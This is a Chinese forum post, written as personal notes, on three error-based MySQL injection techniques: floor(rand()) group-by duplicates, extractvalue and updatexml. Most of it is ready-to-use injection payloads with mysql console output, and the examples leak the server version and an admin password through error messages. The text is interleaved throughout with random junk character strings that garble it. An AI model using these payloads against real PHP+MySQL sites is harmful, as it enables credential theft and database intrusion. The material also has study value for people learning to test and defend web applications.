标题: 关于Mysql注入过程中的三种报错方式 [打印本页] 作者: admin 时间: 2012-12-10 10:28 标题: 关于Mysql注入过程中的三种报错方式 放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。 0 K5 t' H' w7 {- W( _, ?实际测试环境: 4 Q. V0 J* [: C3 v2 ` 2 U# J# F. |7 A: g* l 3 d* |: Z) r, S+ e6 Rmysql> show tables;: k: V/ I* P( \( S5 A
+----------------+- X" r$ U- s2 l% [6 {! U# r
| Tables_in_test | % ]; g6 K: W* | u+----------------+ . a- M7 [3 @4 [) ?( L) y' L| admin |9 S5 a7 @* f) J
| article | ! h! ^& Y; Y7 v8 E+----------------+ 8 }5 O' {7 S+ [9 @ - C6 O$ [3 a3 V$ K! t' I # N Z' B: G. x- Y8 [
# f. {% Q% R9 {& M: Y. p& F( A
mysql> describe admin; . M6 {2 }; A3 a' Z2 I+-------+------------------+------+-----+---------+----------------+ ; S* Y7 f' E3 a/ i| Field | Type | Null | Key | Default | Extra | " ]8 r1 f6 P1 n# }/ ^6 X- L+-------+------------------+------+-----+---------+----------------+ # d+ [; u% A4 X* n8 x| id | int(10) unsigned | NO | PRI | NULL | auto_increment | . k# g: k* U& i' H0 k* A0 L- P5 [| user | varchar(50) | NO | | NULL | | * t, w, e8 x: q| pass | varchar(50) | NO | | NULL | |/ f4 H. z. ~' b( n
+-------+------------------+------+-----+---------+----------------+ 1 V; M, s6 j# X% k/ B" L 2 K+ o7 D6 m4 w+ E/ B+ B$ C . i& W$ N( E; U, m! z% j: P
8 Z Z% i' N; _+ \4 r4 Nmysql> describe article;5 N7 E% X2 k7 J4 [ H
+---------+------------------+------+-----+---------+----------------+ , p! J2 c0 n6 l% K- T$ T8 v+ [| Field | Type | Null | Key | Default | Extra |: V, z) l6 M$ n4 ^! }
+---------+------------------+------+-----+---------+----------------+ . L8 q* t3 }, h5 L5 G| id | int(10) unsigned | NO | PRI | NULL | auto_increment | # E) H. G$ J( B0 N3 p6 S| title | varchar(50) | NO | | NULL | | ! m4 E: q7 G, D- D8 i* a& T! N| content | varchar(50) | NO | | NULL | | * P6 L: d& I/ O6 V9 R+---------+------------------+------+-----+---------+----------------+9 m3 _+ D: k) U- Z9 j
1、通过floor报错& _% U- ?0 G) H, |' O
可以通过如下一些利用代码 % e; V: A$ X$ ~9 Z* m 8 a& J% Z# M- h2 R0 ~7 O8 d' Y 7 x! `6 M! P7 a: Y* Gand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x 8 ? F8 P- Y8 \& F( B" u6 [% Ffrom information_schema.tables group by x)a); . L9 x4 q! D1 P9 r5 [ ' D# S4 B* u/ S; M% [# k * ~% [3 |1 S& ~6 band (select count(*) from (select 1 union select null union select !1)x+ j+ R, B! N8 M# g( E
group by concat((select table_name from information_schema.tables limit 1),/ T) H1 _* P3 w: Y
floor(rand(0)*2))); ) t0 J! f7 }8 R& {% p举例如下:: i5 C/ b2 W! r" Z* z
首先进行正常查询:: }6 e; h8 C+ @3 C" \3 c
( u1 v0 I0 T4 X' ?
mysql> select * from article where id = 1; + @1 ?7 Q( Y2 ^" K) c1 i! a+----+-------+---------+ 8 M* L: a# w- {% E b4 || id | title | content |. h: h0 `+ b s5 Q) v
+----+-------+---------+: R5 ] ]2 ~4 K. A1 ~* F8 ^+ @
| 1 | test | do it | # }: S1 n- ^/ f t# k) {' A4 b, j+----+-------+---------+ 9 r1 \" r& E" W h1 n. M假如id输入存在注入的话,可以通过如下语句进行报错。 0 s: d9 Q: U4 ~ s4 { * o/ d) |& [# v/ `3 u! F1 C
; d }7 A- q# c+ a1 s, I. vmysql> select * from article where id = 1 and (select 1 from6 y: C' M) `' R8 h" q! [
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 0 p1 H7 b- Y% O5 I% A1 L8 W$ |& L7 tERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' , I4 a" R* d1 J5 a% H% m& W; _. Z可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 ' g; c$ e0 A+ c! S" i+ r例如我们需要查询管理员用户名和密码: 1 a" @# ?0 H! L" r$ X/ k O' e a; `Method1: 9 ~0 w5 I, r9 H/ s& ?6 u 9 e' _. z# |3 O9 G0 I 5 p( f; m Y: X7 h9 h$ u; K _mysql> select * from article where id = 1 and (select 1 from1 ?; w9 l* w3 g2 k; b
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x$ G/ s8 h+ ?) i; ~. w
from information_schema.tables group by x)a);2 l" \" ?! p# t+ V1 v
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 s5 z V9 B5 X/ k4 i
Method2: 3 \4 D+ n1 ^4 \4 Y' y 6 n% M: L/ g% A0 o% R ' }2 V& r) K' I; s
mysql> select * from article where id = 1 and (select count(*) 9 W8 n# \+ p8 t2 q( l* hfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),) n8 y& S9 B; s! g
floor(rand(0)*2)));6 l' C p! L4 s: \) F
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'# J4 Q {0 C; J: q( S
2、ExtractValue7 ^# x6 U2 @) o3 Y5 T& y
测试语句如下3 k. k$ ~6 [! s& x4 m4 w4 t9 z
- _+ X5 [; w& W! } ( j. r* e3 ^3 q! hand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 3 \, ? v6 H. t- d- @实际测试过程 D7 D& o( V8 y7 S2 | " K" t& N8 Z; ~
1 {5 I7 N. K+ y( m( V
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, 6 \" ]( o: p. l; E0 _0 u8 Y(select pass from admin limit 1)));-- 3 Z% i( Y4 z: R. g- F+ E. R* AERROR 1105 (HY000): XPATH syntax error: '\admin888' ( T; ?: T, r5 M/ u3 r8 X* q$ K3、UpdateXml 0 C8 k+ |: Z1 [/ r! \/ `测试语句 + l/ b( J9 U1 K1 S+ e , _1 d6 b+ } F6 K3 O - k) q5 y3 x3 v8 X! l/ H
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) * ~( x1 a. T4 z8 N1 ^. o) I' G* \- a实际测试过程9 C/ r4 n' F/ ~+ J$ i
, X5 w+ q' ~. X. w4 V
8 n/ @8 K+ _* G9 p8 y, ]
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24, 5 c& U- l; [( L" T( d(select pass from admin limit 1),0x5e24),1));/ y4 Y3 M* F9 l' U# V
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'' [+ I/ i$ ?' C5 H ], q" R+ k
All, thanks foreign guys.9 B" G8 R( `3 s* N' e! t
* ~: D! b. m5 n, L! E
0 Q- x; i4 E" O! u# d